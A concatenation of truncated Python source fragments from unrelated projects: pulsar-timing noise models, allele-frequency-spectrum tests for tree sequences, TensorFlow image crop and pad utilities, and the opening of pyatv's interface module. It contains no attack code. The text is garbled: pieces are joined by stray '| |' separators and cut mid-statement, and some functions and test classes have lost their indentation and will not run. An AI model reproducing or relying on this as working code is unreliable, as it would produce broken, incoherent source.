        min_span = (p.toas.min() - t_start) / const.yr + min_yr
        if slice_yr > min_span or backward:
            p.filter_data(start_time=t_start / const.day,
                          end_time=t_end / const.day)
            selected.append(p)
    return selected
# Single-pulsar burst-with-memory model.
@signal_base.function
def bwm_sngl_delay(toas, pos, log10_h=None, h=None,
                   sign=1.0, t0=55000):
    """
    Pulsar-term gravitational-wave burst-with-memory signal (see Seto et al.,
    van Haasteren & Levin, Pshirkov et al., Cordes & Jenet).

    The amplitude h absorbs the angular response to simplify the search
    space, i.e. h_this = h_bwm * B(theta, phi), and the polarisation is
    reduced to a "sign" variable.

    :param toas: Time-of-arrival measurements [s]
    :param pos: Unit vector from Earth to pulsar
    :param log10_h: log10 of GW strain (used when *h* is None)
    :param h: GW strain
    :param sign: parameter to sample sign (glitch/anti-glitch)
    :param t0: Burst central time [day]
    :raises TypeError: if neither *h* nor *log10_h* is given
    :return: the waveform as induced timing residuals [s]
    """
    if h is None and log10_h is None:
        raise TypeError("specify one of 'h' or 'log10_h'")
    strain = h if h is not None else 10 ** log10_h
    t0_sec = t0 * const.day
    # step(x) = 0.5*(sign(x)+1): 0 before the burst, 1 after, 0.5 at t0;
    # the memory term then grows linearly after the burst.
    ramp = 0.5 * (np.sign(toas - t0_sec) + 1) * (toas - t0_sec)
    return np.sign(sign) * strain * ramp
def white_noise_block(vary=False):
    """
    Build the white-noise model:
    1. EFAC per backend/receiver system
    2. EQUAD per backend/receiver system
    3. ECORR per backend/receiver system

    :param vary: when True the parameters get uniform priors; otherwise they
        are Constant placeholders whose values are set later.
    :return: the combined enterprise signal (EFAC + EQUAD + ECORR).
    """
    # Select white-noise parameters independently per observing backend.
    backend = selections.Selection(selections.by_backend)
    if vary:
        efac = parameter.Uniform(0.01, 10.0)
        equad = parameter.Uniform(-8.5, -5)
        ecorr = parameter.Uniform(-8.5, -5)
    else:
        efac = parameter.Constant()
        equad = parameter.Constant()
        ecorr = parameter.Constant()
    ef = white_signals.MeasurementNoise(efac=efac, selection=backend)
    eq = white_signals.EquadNoise(log10_equad=equad, selection=backend)
    ec = white_signals.EcorrKernelNoise(log10_ecorr=ecorr, selection=backend)
    return ef + eq + ec
def free_noise_block(prior='log-uniform', Tspan=None):
    """Returns free spectrum noise model:
    1. noise PSD with 30 sampling frequencies

    :param prior:
        Prior on log10_rho. Default is "log-uniform". Use "uniform" for
        upper limits.
    :param Tspan:
        Sets frequency sampling f_i = i / Tspan. Default will
        use overall time span for individual pulsar.
    :raises ValueError: if *prior* is not a recognised option.
    """
    if prior == 'uniform':
        log10_rho = parameter.LinearExp(-9, -4, size=30)
    elif prior == 'log-uniform':
        log10_rho = parameter.Uniform(-9, -4, size=30)
    else:
        # BUG FIX: an unrecognised prior previously fell through and raised a
        # confusing NameError on log10_rho below; fail fast with a clear
        # message, consistent with red_noise_block.
        raise ValueError('Unknown prior for free spectrum noise!')
    spect = free_spectrum(log10_rho=log10_rho)
    fn = gp_signals.FourierBasisGP(spect, components=30, Tspan=Tspan)
    return fn
def red_noise_block(prior='log-uniform', Tspan=None):
    """
    Build the red-noise model: a power-law PSD sampled at 30 frequencies.

    :param prior:
        Prior on log10_A. Default is "log-uniform". Use "uniform" for
        upper limits.
    :param Tspan:
        Sets frequency sampling f_i = i / Tspan. Default will use the
        overall time span of the individual pulsar.
    :raises ValueError: if *prior* is not a recognised option.
    :return: the FourierBasisGP red-noise signal.
    """
    if prior == 'uniform':
        log10_A = parameter.LinearExp(-20, -11)
    elif prior == 'log-uniform':
        log10_A = parameter.Uniform(-20, -11)
    else:
        raise ValueError('Unknown prior for red noise amplitude!')
    gamma = parameter.Uniform(0, 7)
    psd = utils.powerlaw(log10_A=log10_A, gamma=gamma)
    return gp_signals.FourierBasisGP(psd, components=30, Tspan=Tspan)
def dm_noise_block(gp_kernel='diag', psd='powerlaw', nondiag_kernel='periodic',
prior='log-uniform', Tspan=None, components=30, gamma_val=None):
"""
Returns DM noise model:
1. DM noise modeled as a power-law with 30 sampling frequencies
:param psd:
PSD function [e.g. powerlaw (default), turnover, free spectrum]
:param prior:
Prior on log10_A. Default if "log-uniform". Use "uniform" for
upper limits.
:param Tspan:
Sets frequency sampling f_i = i / Tspan. Default will
use overall time span for indivicual pulsar.
:param components:
Number of frequencies in sampling of DM-variations.
:param gamma_val:
If given, this is the fixed slope of the power-law for
powerlaw or turnover DM-variations
"""
# dm noise parameters that are common
if gp_kernel == 'diag':
if psd in ['powerlaw', 'turnover']:
# parameters shared by PSD functions
if prior == 'uniform':
log10_A_dm = parameter.LinearExp(-20, -11)
elif prior == | |
= 0
for edge in edges_in:
u = edge.child
v = edge.parent
parent[u] = v
branch_length[u] = time[v] - time[u]
while v != -1:
update_result(window_index, v, t_left)
count[v] += count[u]
v = parent[v]
# Update the windows
while window_index < num_windows and windows[window_index + 1] <= t_right:
w_right = windows[window_index + 1]
# This seems like a bad idea as we incur a O(N) cost for each window,
# where N is the number of nodes. It might be hard to do much better
# though, since we can't help but incur O(|sample_set|) cost at each window
# which we'll assume is O(n), and for large n, N isn't much larger than n.
# For K > 1 dimensions, the cost of the scan through the nodes is much
# less than the O(n^K) required to copy (if n is large and K is small).
# We could keep track of the roots and do a tree traversal, bringing this
# down to O(n), but this adds a lot of complexity and memory and I'm
# fairly confident would be slower overall. We could keep a set of
# non-zero branches, but this would add a O(log n) cost to each edge
# insertion and removal and a lot of complexity to the C implementation.
for u in range(ts.num_nodes):
update_result(window_index, u, w_right)
window_index += 1
tree_index += 1
assert window_index == windows.shape[0] - 1
if span_normalise:
for j in range(num_windows):
result[j] /= windows[j + 1] - windows[j]
return result
def site_allele_frequency_spectrum(
    ts, sample_sets, windows, polarised=False, span_normalise=True
):
    """
    Efficient implementation of the algorithm used as the basis for the
    underlying C version.

    Computes the (joint) site allele frequency spectrum over the given
    windows by maintaining, for each tree node, the number of samples of
    each sample set beneath it, and turning each site's mutations into
    per-allele sample counts.
    """
    windows = ts.parse_windows(windows)
    num_windows = windows.shape[0] - 1
    # One AFS dimension per sample set; index k counts alleles carried by
    # exactly k samples of that set (0..len(sample_set)).
    out_dim = [1 + len(sample_set) for sample_set in sample_sets]
    result = np.zeros([num_windows] + out_dim)
    # Add an extra sample set to count across all samples
    sample_sets = list(sample_sets) + [ts.samples()]
    # Number of nodes in sample_set j ancestral to each node u.
    count = np.zeros((ts.num_nodes, len(sample_sets)), dtype=np.uint32)
    for j in range(len(sample_sets)):
        count[sample_sets[j], j] = 1
    site_index = 0
    mutation_index = 0
    window_index = 0
    sites = ts.tables.sites
    mutations = ts.tables.mutations
    # parent[u] is the current tree parent of node u, or -1 for roots.
    parent = np.zeros(ts.num_nodes, dtype=np.int32) - 1
    for (t_left, t_right), edges_out, edges_in in ts.edge_diffs():
        # Remove outgoing edges: subtract u's counts from all old ancestors.
        for edge in edges_out:
            u = edge.child
            v = edge.parent
            while v != -1:
                count[v] -= count[u]
                v = parent[v]
            parent[u] = -1
        # Insert incoming edges: add u's counts to all new ancestors.
        for edge in edges_in:
            u = edge.child
            v = edge.parent
            parent[u] = v
            while v != -1:
                count[v] += count[u]
                v = parent[v]
        # Process every site that falls inside this tree's interval.
        while site_index < len(sites) and sites.position[site_index] < t_right:
            assert t_left <= sites.position[site_index]
            ancestral_state = sites[site_index].ancestral_state
            # allele -> per-sample-set count of carriers; initially every
            # sample carries the ancestral state.
            allele_count = collections.defaultdict(
                functools.partial(np.zeros, len(sample_sets), dtype=int)
            )
            allele_count[ancestral_state][:] = [
                len(sample_set) for sample_set in sample_sets
            ]
            # Apply this site's mutations in order, moving carriers from the
            # parent allele (or ancestral state) to the derived allele.
            while (
                mutation_index < len(mutations)
                and mutations[mutation_index].site == site_index
            ):
                mutation = mutations[mutation_index]
                allele_count[mutation.derived_state] += count[mutation.node]
                if mutation.parent != -1:
                    parent_allele = mutations[mutation.parent].derived_state
                    allele_count[parent_allele] -= count[mutation.node]
                else:
                    allele_count[ancestral_state] -= count[mutation.node]
                mutation_index += 1
            # Advance to the window containing this site's position.
            pos = sites.position[site_index]
            while windows[window_index + 1] <= pos:
                window_index += 1
            assert windows[window_index] <= pos < windows[window_index + 1]
            site_result = result[window_index]
            # Iterate over a copy (dict(...)) so deleting entries is safe.
            for allele, c in dict(allele_count).items():
                # Any allele monomorphic across all samples does not
                # contribute to the AFS
                if 0 == c[-1] or c[-1] == ts.num_samples:
                    del allele_count[allele]
            if polarised and ancestral_state in allele_count:
                del allele_count[ancestral_state]
            # Unpolarised spectra fold and count each allele with weight 1/2.
            increment = 1 if polarised else 0.5
            for _allele, c in allele_count.items():
                # Drop the trailing "all samples" count before indexing.
                x = tuple(c[:-1])
                if not polarised:
                    x = fold(x, out_dim)
                site_result[x] += increment
            site_index += 1
    if span_normalise:
        # Convert window totals to per-unit-of-sequence-length values.
        for j in range(num_windows):
            span = windows[j + 1] - windows[j]
            result[j] /= span
    return result
def allele_frequency_spectrum(
    ts, sample_sets, windows=None, polarised=False, mode="site", span_normalise=True
):
    """
    Generalised site frequency spectrum, dispatching on *mode*
    ("site" or "branch") to the corresponding implementation.
    """
    implementations = {
        "site": site_allele_frequency_spectrum,
        "branch": branch_allele_frequency_spectrum,
    }
    # Unknown modes raise KeyError, matching the original dispatch behaviour.
    implementation = implementations[mode]
    return implementation(
        ts,
        sample_sets,
        windows=windows,
        polarised=polarised,
        span_normalise=span_normalise,
    )
class TestAlleleFrequencySpectrum(StatsTestCase, SampleSetStatsMixin):
    """Shared tests comparing the naive, efficient and library AFS
    implementations on the same inputs.

    Subclasses set ``mode`` and mix in example generators.
    """

    # Derived classes define this to get a specific stats mode.
    mode = None

    def verify_single_sample_set(self, ts):
        """Omitting sample_sets must be equivalent to passing [all samples],
        for each windows / polarised / span_normalise option."""
        L = ts.sequence_length
        samples = ts.samples()
        a1 = ts.allele_frequency_spectrum(mode=self.mode)
        a2 = ts.allele_frequency_spectrum([samples], mode=self.mode)
        self.assertArrayEqual(a1, a2)
        for windows in [None, (0, L), (0, L / 2, L)]:
            a1 = ts.allele_frequency_spectrum(mode=self.mode, windows=windows)
            a2 = ts.allele_frequency_spectrum(
                [samples], mode=self.mode, windows=windows
            )
            self.assertArrayEqual(a1, a2)
        for polarised in [True, False]:
            a1 = ts.allele_frequency_spectrum(mode=self.mode, polarised=polarised)
            a2 = ts.allele_frequency_spectrum(
                [samples], mode=self.mode, polarised=polarised
            )
            self.assertArrayEqual(a1, a2)
        for span_normalise in [True, False]:
            a1 = ts.allele_frequency_spectrum(
                mode=self.mode, span_normalise=span_normalise
            )
            a2 = ts.allele_frequency_spectrum(
                [samples], mode=self.mode, span_normalise=span_normalise
            )
            self.assertArrayEqual(a1, a2)

    def verify_sample_sets(self, ts, sample_sets, windows):
        """Check that all three implementations agree in shape and (almost
        exactly) in value for every polarised/span_normalise combination."""
        # print(ts.genotype_matrix())
        # print(ts.draw_text())
        # print("sample_sets = ", sample_sets)
        windows = ts.parse_windows(windows)
        for span_normalise, polarised in itertools.product(
            [True, False], [True, False]
        ):
            sfs1 = naive_allele_frequency_spectrum(
                ts,
                sample_sets,
                windows,
                mode=self.mode,
                polarised=polarised,
                span_normalise=span_normalise,
            )
            sfs2 = allele_frequency_spectrum(
                ts,
                sample_sets,
                windows,
                mode=self.mode,
                polarised=polarised,
                span_normalise=span_normalise,
            )
            sfs3 = ts.allele_frequency_spectrum(
                sample_sets,
                windows,
                mode=self.mode,
                polarised=polarised,
                span_normalise=span_normalise,
            )
            # Expected shape: one row per window, one dimension per sample
            # set, each of size len(sample_set) + 1.
            self.assertEqual(sfs1.shape[0], len(windows) - 1)
            self.assertEqual(len(sfs1.shape), len(sample_sets) + 1)
            for j, sample_set in enumerate(sample_sets):
                n = 1 + len(sample_set)
                self.assertEqual(sfs1.shape[j + 1], n)
            self.assertEqual(len(sfs1.shape), len(sample_sets) + 1)
            self.assertEqual(sfs1.shape, sfs2.shape)
            self.assertEqual(sfs1.shape, sfs3.shape)
            # Debugging aid: dump all three spectra on mismatch.
            if not np.allclose(sfs1, sfs3):
                print()
                print("sample sets", sample_sets)
                print("simple", sfs1)
                print("effic ", sfs2)
                print("ts    ", sfs3)
            self.assertArrayAlmostEqual(sfs1, sfs2)
            self.assertArrayAlmostEqual(sfs1, sfs3)
class TestBranchAlleleFrequencySpectrum(
    TestAlleleFrequencySpectrum, TopologyExamplesMixin
):
    """Runs the shared AFS tests in "branch" mode over topology examples."""

    mode = "branch"

    def test_simple_example(self):
        """Spot-check a small simulated tree sequence over several
        sample-set partitions and two windows."""
        ts = msprime.simulate(6, recombination_rate=0.1, random_seed=1)
        self.verify_single_sample_set(ts)
        self.verify_sample_sets(ts, [range(6)], [0, 1])
        self.verify_sample_sets(ts, [[0, 1]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1], [2, 3]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1, 2, 3, 4, 5]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1, 2], [3, 4, 5]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1], [2, 3], [4, 5]], [0, 1])
class TestSiteAlleleFrequencySpectrum(
    TestAlleleFrequencySpectrum, MutatedTopologyExamplesMixin
):
    """Runs the shared AFS tests in "site" mode over mutated examples."""

    mode = "site"

    def test_simple_example(self):
        """Spot-check a small mutated tree sequence over several
        sample-set partitions and two windows."""
        ts = msprime.simulate(6, mutation_rate=0.2, random_seed=1)
        self.verify_single_sample_set(ts)
        self.verify_sample_sets(ts, [[0]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1, 2, 3, 4, 5]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1, 2], [3, 4, 5]], [0, 1])
        self.verify_sample_sets(ts, [[0, 1], [2, 3], [4, 5]], [0, 1])
class TestBranchAlleleFrequencySpectrumProperties(StatsTestCase, TopologyExamplesMixin):
    """Invariant checks for the branch-mode AFS."""

    def verify(self, ts):
        """Per-tree windows: the AFS (doubled when unpolarised) must sum to
        the tree's total branch length over non-trivial nodes."""
        # If we split by tree, the sum of the AFS should be equal to the
        # tree total branch length in each window
        windows = ts.breakpoints(as_array=True)
        S = ts.samples()
        examples = [
            [S],
            [S[:1]],
            [S[:-1]],
            [S[:1], S[1:]],
            [S[:1], S[:-1]],
        ]
        if len(S) > 2:
            examples += [[S[:1], S[2:], S[:3]]]
        # This is the same definition that we use for segregating_sites:
        # only branches subtending a proper, non-empty subset of samples.
        tbl = [
            sum(
                tree.branch_length(u)
                for u in tree.nodes()
                if 0 < tree.num_samples(u) < ts.num_samples
            )
            for tree in ts.trees()
        ]
        for polarised in [True, False]:
            for sample_sets in examples:
                afs = ts.allele_frequency_spectrum(
                    sample_sets,
                    windows=windows,
                    mode="branch",
                    polarised=polarised,
                    span_normalise=True,
                )
                # Unpolarised spectra count each branch with weight 1/2.
                if not polarised:
                    afs *= 2
                afs_sum = [np.sum(window) for window in afs]
                self.assertArrayAlmostEqual(afs_sum, tbl)
############################################
# End of specific stats tests.
############################################
class TestWindowedTreeStat(StatsTestCase):
    """
    Tests that the treewise windowing function defined here has the correct
    behaviour.
    """

    # TODO add more tests here covering the various windowing possibilities.
    def get_tree_sequence(self):
        """Simulate a small recombinant tree sequence with several trees."""
        ts = msprime.simulate(10, recombination_rate=2, random_seed=1)
        self.assertGreater(ts.num_trees, 3)
        return ts

    def test_all_trees(self):
        """Windows at every breakpoint: output keeps the per-tree shape."""
        ts = self.get_tree_sequence()
        A1 = np.ones((ts.num_trees, 1))
        windows = np.array(list(ts.breakpoints()))
        A2 = windowed_tree_stat(ts, A1, windows)
        # print("breakpoints = ", windows)
        # print(A2)
        self.assertEqual(A1.shape, A2.shape)
        # JK: I don't understand what we're computing here, this normalisation
        # seems pretty weird.
        # for tree in ts.trees():
        #     self.assertAlmostEqual(A2[tree.index, 0], tree.span / ts.sequence_length)

    def test_single_interval(self):
        """A single whole-sequence window collapses the tree axis to 1."""
        ts = self.get_tree_sequence()
        A1 = np.ones((ts.num_trees, 1))
        windows = np.array([0, ts.sequence_length])
        A2 = windowed_tree_stat(ts, A1, windows)
        self.assertEqual(A2.shape, (1, 1))
        # TODO: Test output
class TestSampleSets(StatsTestCase):
"""
Tests that passing sample sets in various ways gets interpreted correctly.
"""
def get_example_ts(self):
ts = msprime.simulate(10, mutation_rate=1, recombination_rate=1, random_seed=2)
assert ts.num_mutations > 0
return ts
def test_duplicate_samples(self):
ts = self.get_example_ts()
for bad_set in [[1, 1], [1, 2, 1], list(range(10)) + [9]]:
with self.assertRaises(exceptions.LibraryError):
ts.diversity([bad_set])
with self.assertRaises(exceptions.LibraryError):
ts.divergence([[0, 1], bad_set])
with self.assertRaises(ValueError):
ts.sample_count_stat([bad_set], self.identity_f(ts), 1)
def test_empty_sample_set(self):
ts = self.get_example_ts()
with self.assertRaises(ValueError):
ts.diversity([[]])
for bad_sample_sets in [[[], []], [[1], []], [[1, 2], [1], []]]:
with self.assertRaises(ValueError):
ts.diversity(bad_sample_sets)
with self.assertRaises(ValueError):
ts.divergence(bad_sample_sets)
with self.assertRaises(ValueError):
ts.sample_count_stat(bad_sample_sets, self.identity_f(ts), 1)
def test_non_samples(self):
ts = self.get_example_ts()
with self.assertRaises(exceptions.LibraryError):
ts.diversity([[ts.num_samples]])
with self.assertRaises(exceptions.LibraryError):
ts.divergence([[ts.num_samples], [1, 2]])
with self.assertRaises(ValueError):
ts.sample_count_stat([[ts.num_samples]], self.identity_f(ts), 1)
def test_span_normalise(self):
ts = self.get_example_ts()
sample_sets = [[0, 1], [2, 3, 4], [5, 6]]
windows = ts.sequence_length * np.random.uniform(size=10)
windows.sort()
windows[0] = 0.0
windows[-1] = | |
# Lint as: python2, python3
# Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions related to preprocessing inputs."""
import numpy as np
from six.moves import range
from six.moves import zip
import tensorflow as tf
def flip_dim(tensor_list, prob=0.5, dim=1):
  """Randomly flips a dimension of the given tensors.

  The flip decision is made once and applied to every tensor, so either all
  of the inputs are flipped or none are. tf.random_flip_left_right /
  tf.random_flip_up_down are not used because they neither expose the
  probability nor guarantee the same decision across images.

  Args:
    tensor_list: A list of `Tensors` with the same number of dimensions.
    prob: The probability of flipping.
    dim: The dimension to flip, 0, 1, ..

  Returns:
    outputs: A list of the possibly flipped `Tensors`, followed by an
      indicator `Tensor` that is `True` if the inputs were flipped and
      `False` otherwise.

  Raises:
    ValueError: If dim is negative or greater than the dimension of a
      `Tensor`.
  """
  coin = tf.random.uniform([])
  is_flipped = tf.less_equal(coin, prob)

  def _flip_all():
    flipped_tensors = []
    for tensor in tensor_list:
      if dim < 0 or dim >= len(tensor.get_shape().as_list()):
        raise ValueError('dim must represent a valid dimension.')
      flipped_tensors.append(tf.compat.v1.reverse_v2(tensor, [dim]))
    return flipped_tensors

  outputs = tf.cond(is_flipped, _flip_all, lambda: tensor_list)
  if not isinstance(outputs, (list, tuple)):
    outputs = [outputs]
  outputs.append(is_flipped)
  return outputs
def _image_dimensions(image, rank):
  """Returns the dimensions of an image tensor.

  Args:
    image: A rank-D Tensor, e.g. 3-D of shape `[height, width, channels]`.
    rank: The expected rank of the image.

  Returns:
    A list of the input image's dimensions: statically known dimensions are
    Python integers, the rest are integer scalar tensors.
  """
  shape = image.get_shape()
  if shape.is_fully_defined():
    return shape.as_list()
  static_dims = shape.with_rank(rank).as_list()
  dynamic_dims = tf.unstack(tf.shape(image), rank)
  # Prefer the static value where available, fall back to the dynamic one.
  return [
      static if static is not None else dynamic
      for static, dynamic in zip(static_dims, dynamic_dims)
  ]
def get_label_resize_method(label):
  """Returns the resize method to use for a label tensor, based on its dtype.

  Args:
    label: Groundtruth label tensor.

  Returns:
    tf.image.ResizeMethod.BILINEAR for floating labels,
    tf.image.ResizeMethod.NEAREST_NEIGHBOR for integer labels.

  Raises:
    ValueError: If label is neither floating nor integer.
  """
  dtype = label.dtype
  if dtype.is_floating:
    return tf.image.ResizeMethod.BILINEAR
  if dtype.is_integer:
    return tf.image.ResizeMethod.NEAREST_NEIGHBOR
  raise ValueError('Label type must be either floating or integer.')
def pad_to_bounding_box(image, offset_height, offset_width, target_height,
                        target_width, pad_value):
    """Pads the given image with the given pad_value.

    Works like tf.image.pad_to_bounding_box, except it can pad the image
    with any given arbitrary pad value and also handle images whose sizes are not
    known during graph construction.

    Args:
        image: 3-D tensor with shape [height, width, channels] (a 4-D batch
            tensor [batch, height, width, channels] is also accepted).
        offset_height: Number of rows of zeros to add on top.
        offset_width: Number of columns of zeros to add on the left.
        target_height: Height of output image.
        target_width: Width of output image.
        pad_value: Value to pad the image tensor with.

    Returns:
        3-D tensor of shape [target_height, target_width, channels] (or the
        4-D batch equivalent when a batch was supplied).

    Raises:
        ValueError: If the shape of image is incompatible with the offset_* or
            target_* arguments.
    """
    with tf.compat.v1.name_scope(None, 'pad_to_bounding_box', [image]):
        image = tf.convert_to_tensor(image, name='image')
        original_dtype = image.dtype
        if original_dtype != tf.float32 and original_dtype != tf.float64:
            # If image dtype is not float, we convert it to int32 to avoid overflow.
            image = tf.cast(image, tf.int32)
        # Runtime rank check; rank may be unknown at graph-construction time.
        image_rank_assert = tf.Assert(
            tf.logical_or(
                tf.equal(tf.rank(image), 3),
                tf.equal(tf.rank(image), 4)),
            ['Wrong image tensor rank.'])
        # Shift pixel values down by pad_value so that padding with zeros
        # (tf.pad) and adding pad_value back afterwards leaves pad_value in
        # the padded region and the original values elsewhere.
        with tf.control_dependencies([image_rank_assert]):
            image -= pad_value
        image_shape = image.get_shape()
        is_batch = True
        if image_shape.ndims == 3:
            is_batch = False
            image = tf.expand_dims(image, 0)
        elif image_shape.ndims is None:
            # Rank unknown statically: assume unbatched; the runtime assert
            # above catches actual rank errors.
            is_batch = False
            image = tf.expand_dims(image, 0)
            image.set_shape([None] * 4)
        elif image.get_shape().ndims != 4:
            raise ValueError('Input image must have either 3 or 4 dimensions.')
        _, height, width, _ = _image_dimensions(image, rank=4)
        target_width_assert = tf.Assert(
            tf.greater_equal(
                target_width, width),
            ['target_width must be >= width'])
        target_height_assert = tf.Assert(
            tf.greater_equal(target_height, height),
            ['target_height must be >= height'])
        with tf.control_dependencies([target_width_assert]):
            after_padding_width = target_width - offset_width - width
        with tf.control_dependencies([target_height_assert]):
            after_padding_height = target_height - offset_height - height
        offset_assert = tf.Assert(
            tf.logical_and(
                tf.greater_equal(after_padding_width, 0),
                tf.greater_equal(after_padding_height, 0)),
            ['target size not possible with the given target offsets'])
        # Paddings are [before, after] per axis; batch and channel axes are
        # never padded.
        batch_params = tf.stack([0, 0])
        height_params = tf.stack([offset_height, after_padding_height])
        width_params = tf.stack([offset_width, after_padding_width])
        channel_params = tf.stack([0, 0])
        with tf.control_dependencies([offset_assert]):
            paddings = tf.stack([batch_params, height_params, width_params,
                                 channel_params])
        padded = tf.pad(image, paddings)
        if not is_batch:
            padded = tf.squeeze(padded, axis=[0])
        # Undo the earlier shift: original values are restored and the padded
        # region becomes pad_value.
        outputs = padded + pad_value
        if outputs.dtype != original_dtype:
            outputs = tf.cast(outputs, original_dtype)
        return outputs
def _crop(image, offset_height, offset_width, crop_height, crop_width):
    """Crops the given image using the provided offsets and sizes.

    Note that the method doesn't assume we know the input image size but it does
    assume we know the input image rank.

    Args:
        image: an image of shape [height, width, channels].
        offset_height: a scalar tensor indicating the height offset.
        offset_width: a scalar tensor indicating the width offset.
        crop_height: the height of the cropped image.
        crop_width: the width of the cropped image.

    Returns:
        The cropped (and resized) image.

    Raises:
        ValueError: if `image` doesn't have rank of 3.
        InvalidArgumentError: if the rank is not 3 or if the image dimensions are
            less than the crop size.
    """
    original_shape = tf.shape(image)
    # Static rank check at graph-construction time...
    if len(image.get_shape().as_list()) != 3:
        raise ValueError('input must have rank of 3')
    original_channels = image.get_shape().as_list()[2]
    # ...and a runtime assertion for dynamically shaped inputs.
    rank_assertion = tf.Assert(
        tf.equal(tf.rank(image), 3),
        ['Rank of image must be equal to 3.'])
    with tf.control_dependencies([rank_assertion]):
        cropped_shape = tf.stack([crop_height, crop_width, original_shape[2]])
    size_assertion = tf.Assert(
        tf.logical_and(
            tf.greater_equal(original_shape[0], crop_height),
            tf.greater_equal(original_shape[1], crop_width)),
        ['Crop size greater than the image size.'])
    offsets = tf.cast(tf.stack([offset_height, offset_width, 0]), tf.int32)
    # Use tf.slice instead of crop_to_bounding box as it accepts tensors to
    # define the crop size.
    with tf.control_dependencies([size_assertion]):
        image = tf.slice(image, offsets, cropped_shape)
    # Reshape + set_shape restore as much static shape information as possible.
    image = tf.reshape(image, cropped_shape)
    image.set_shape([crop_height, crop_width, original_channels])
    return image
def random_crop(image_list, crop_height, crop_width):
    """Crops the given list of images.

    The function applies the same crop to each image in the list. This can be
    effectively applied when there are multiple image inputs of the same
    dimension such as:

        image, depths, normals = random_crop([image, depths, normals], 120, 150)

    Args:
        image_list: a list of image tensors of the same dimension but possibly
            varying channel.
        crop_height: the new height.
        crop_width: the new width.

    Returns:
        the image_list with cropped images.

    Raises:
        ValueError: if there are multiple image inputs provided with different
            size or the images are smaller than the crop dimensions.
    """
    if not image_list:
        raise ValueError('Empty image_list.')
    # Compute the rank assertions (every image must be rank 3 at runtime).
    rank_assertions = []
    for i in range(len(image_list)):
        image_rank = tf.rank(image_list[i])
        rank_assert = tf.Assert(
            tf.equal(image_rank, 3), [
                'Wrong rank for tensor %d in image_list [expected] [actual]', i, 3,
                image_rank
            ])
        rank_assertions.append(rank_assert)
    with tf.control_dependencies([rank_assertions[0]]):
        image_shape = tf.shape(image_list[0])
    image_height = image_shape[0]
    image_width = image_shape[1]
    crop_size_assert = tf.Assert(
        tf.logical_and(
            tf.greater_equal(image_height, crop_height),
            tf.greater_equal(image_width, crop_width)),
        ['Crop size greater than the image size.'])
    asserts = [rank_assertions[0], crop_size_assert]
    # All remaining images must have exactly the same height/width as the
    # first one; build runtime assertions verifying that.
    for i in range(1, len(image_list)):
        image = image_list[i]
        asserts.append(rank_assertions[i])
        with tf.control_dependencies([rank_assertions[i]]):
            shape = tf.shape(image)
        height = shape[0]
        width = shape[1]
        height_assert = tf.Assert(
            tf.equal(height, image_height), [
                'Wrong height for tensor %d in image_list [expected][actual]', i,
                height, image_height
            ])
        width_assert = tf.Assert(
            tf.equal(width, image_width), [
                'Wrong width for tensor %d in image_list [expected][actual]', i,
                width, image_width
            ])
        asserts.extend([height_assert, width_assert])
    # Create a random bounding box.
    #
    # Use tf.random.uniform and not numpy.random.rand as doing the former would
    # generate random numbers at graph eval time, unlike the latter which
    # generates random numbers at graph definition time.
    with tf.control_dependencies(asserts):
        max_offset_height = tf.reshape(image_height - crop_height + 1, [])
        max_offset_width = tf.reshape(image_width - crop_width + 1, [])
    offset_height = tf.random.uniform([],
                                      maxval=max_offset_height,
                                      dtype=tf.int32)
    offset_width = tf.random.uniform([], maxval=max_offset_width, dtype=tf.int32)
    # The same random offsets are applied to every image in the list.
    return [_crop(image, offset_height, offset_width,
                  crop_height, crop_width) for image in image_list]
def get_random_scale(min_scale_factor, max_scale_factor, step_size):
"""Gets a random scale value.
Args:
min_scale_factor: Minimum scale value.
max_scale_factor: Maximum scale value.
step_size: The | |
<filename>pyatv/interface.py<gh_stars>0
"""Public interface exposed by library.
This module contains all the interfaces that represents a generic Apple TV device and
all its features.
"""
import re
import inspect
import hashlib
from typing import (
Any,
Dict,
Optional,
NamedTuple,
Callable,
TypeVar,
Tuple,
Union,
List,
)
import weakref
from abc import ABC, abstractmethod
from pyatv import const, convert, exceptions
from pyatv.const import (
Protocol,
OperatingSystem,
DeviceModel,
FeatureState,
FeatureName,
InputAction,
)
from pyatv.support import net
__pdoc__ = {}
__pdoc__["feature"] = False  # Hide the internal `feature` decorator from pdoc output

# Registry of all declared features: index -> (name, description).
# Populated by the `feature` decorator; duplicate indices raise at import time.
_ALL_FEATURES = {}  # type: Dict[int, Tuple[str, str]]

# Generic callable type preserved by the `feature` decorator.
ReturnType = TypeVar("ReturnType", bound=Callable[..., Any])
class ArtworkInfo(NamedTuple):
    """Artwork information."""

    bytes: bytes  # Raw image data (field name shadows the builtin; kept for API compatibility)
    mimetype: str  # MIME type of the image data, e.g. "image/png"
    width: int  # Image width (presumably pixels — confirm against producers)
    height: int  # Image height (presumably pixels — confirm against producers)
class FeatureInfo(NamedTuple):
    """Feature state and options."""

    state: FeatureState  # Current availability state of the feature
    # NOTE(review): the default `{}` is a single dict object shared by every
    # FeatureInfo created without explicit options; safe only as long as no
    # caller mutates it — confirm.
    options: Optional[Dict[str, object]] = {}
class _ListenerProxy:
"""Proxy to call functions in a listener.
A proxy instance maintains a weak reference to a listener object and allows calling
functions in the listener. If no listener is set or the weak reference has expired,
a null-function (doing nothing) is returned so that nothing happens. This makes it
safe to call functions without having to check if either a listener has been set at
all or if the listener implements the called function.
"""
def __init__(self, listener):
"""Initialize a new ListenerProxy instance."""
self.listener = listener
def __getattr__(self, attr):
"""Dynamically find target method in listener."""
if self.listener is not None:
listener = self.listener()
if hasattr(listener, attr):
return getattr(listener, attr)
return lambda *args, **kwargs: None
class StateProducer:
    """Base class for objects announcing state changes to a listener."""

    def __init__(self) -> None:
        """Initialize a new StateProducer instance."""
        self.__listener: Optional[weakref.ReferenceType[Any]] = None

    @property
    def listener(self):
        """Return current listener object."""
        return _ListenerProxy(self.__listener)

    @listener.setter
    def listener(self, target) -> None:
        """Change current listener object.

